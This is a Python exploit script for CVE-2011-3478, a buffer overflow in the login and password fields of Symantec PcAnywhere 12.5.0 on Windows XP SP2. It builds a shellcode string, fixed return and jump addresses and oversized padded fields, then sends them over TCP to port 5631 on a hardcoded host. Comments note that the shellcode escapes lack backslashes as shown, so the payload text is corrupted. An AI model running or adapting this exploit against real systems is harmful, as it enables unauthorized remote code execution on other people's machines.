
# Title : Symantec PcAnywhere 12.5.0 Login and Password Field Buffer Overflow
# Published : 2012-06-27
# Author :


#!/usr/bin/python

# Exploit Title: Symantec PcAnywhere login and password field buffer overflow
# Date: 2012.06.27
# Author: S2 Crew [Hungary]
# Software Link: symantec.com
# Version: 12.5.0
# Tested on: Windows XP SP2
# CVE: CVE-2011-3478 
 
# Code :
import socket
import time
import struct
import string
import sys

# Payload string as published. In this copy the escape sequences carry no
# backslashes, so Python reads the literal below as plain ASCII text.
shell = (
"xdaxdaxbbx9ex7fxfbx04xd9x74x24xf4x58x2bxc9"
"xb1x56x31x58x18x03x58x18x83xc0x9ax9dx0exf8"
"x4axe8xf1x01x8ax8bx78xe4xbbx99x1fx6cxe9x2d"
"x6bx20x01xc5x39xd1x92xabx95xd6x13x01xc0xd9"
"xa4xa7xccxb6x66xa9xb0xc4xbax09x88x06xcfx48"
"xcdx7bx3fx18x86xf0xedx8dxa3x45x2dxafx63xc2"
"x0dxd7x06x15xf9x6dx08x46x51xf9x42x7exdaxa5"
"x72x7fx0fxb6x4fx36x24x0dx3bxc9xecx5fxc4xfb"
"xd0x0cxfbx33xddx4dx3bxf3x3dx38x37x07xc0x3b"
"x8cx75x1exc9x11xddxd5x69xf2xdfx3axefx71xd3"
"xf7x7bxddxf0x06xafx55x0cx83x4exbax84xd7x74"
"x1exccx8cx15x07xa8x63x29x57x14xdcx8fx13xb7"
"x09xa9x79xd0xfex84x81x20x68x9exf2x12x37x34"
"x9dx1exb0x92x5ax60xebx63xf4x9fx13x94xdcx5b"
"x47xc4x76x4dxe7x8fx86x72x32x1fxd7xdcxecxe0"
"x87x9cx5cx89xcdx12x83xa9xedxf8xb2xedx23xd8"
"x97x99x41xdex06x06xcfx38x42xa6x99x93xfax04"
"xfex2bx9dx77xd4x07x36xe0x60x4ex80x0fx71x44"
"xa3xbcxd9x0fx37xafxddx2ex48xfax75x38x71x6d"
"x0fx54x30x0fx10x7dxa2xacx83x1ax32xbaxbfxb4"
"x65xebx0excdxe3x01x28x67x11xd8xacx40x91x07"
"x0dx4ex18xc5x29x74x0ax13xb1x30x7excbxe4xee"
"x28xadx5ex41x82x67x0cx0bx42xf1x7ex8cx14xfe"
"xaax7axf8x4fx03x3bx07x7fxc3xcbx70x9dx73x33"
"xabx25x83x7exf1x0cx0cx27x60x0dx51xd8x5fx52"
"x6cx5bx55x2bx8bx43x1cx2exd7xc3xcdx42x48xa6"
"xf1xf1x69xe3"
)
# First message of the exchange (original comment: "initial handshake").
init1 = (
"x00x00x00x00" # initial handshake
)

# Second message; the original comment says the "Enter username" prompt
# (NTdialog) follows it.
init2 = (
"x0dx06xfe" # followed by the "Enter username" message (NTdialog)
)

# Username field: 100 filler bytes.
init3 = (
"A" * 100 #+ "r" #username
)

# 32-bit little-endian values ('<L'). The variable names record the role the
# author assigned to each value on the stated test platform (Windows XP SP2);
# nothing in this file verifies those addresses.
readable_xp_sp2 = struct.pack('<L',0x023E5AD0)
call_esi = struct.pack('<L',0x67f7aac4)
jmp = struct.pack('<L',0x414112EB)

# Password field: 1282 filler bytes, the three packed values with two 4-byte
# markers between them, the payload string, then 'E' padding sized from a
# fixed budget so the field has a constant total length.
init4 = (
"B" * 1282 + jmp + readable_xp_sp2 + "DDDD" +call_esi + "AAAA" + shell + "E" * (4000 - 1286 - 12 - len(shell))
)

# Python 2 script (print statements). Target host and port are hardcoded;
# the four messages are sent in sequence with fixed 5 s pauses, and the
# server responses are read but never inspected.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('172.16.29.133',5631)) # hardcoded IP address

print "init packet..."
s.send(init1) # send the data
time.sleep(5)
data = s.recv(1024) # response discarded

print "handshake packet..."
s.send(init2) # send the data
time.sleep(5)
data = s.recv(1024) # response discarded

print "username packet..."
s.send(init3) # send the data
time.sleep(5)
#data = s.recv(1024)

print "password packet..."
s.send(init4) # send the data
s.close() # no further read: the script does not check whether the send succeeded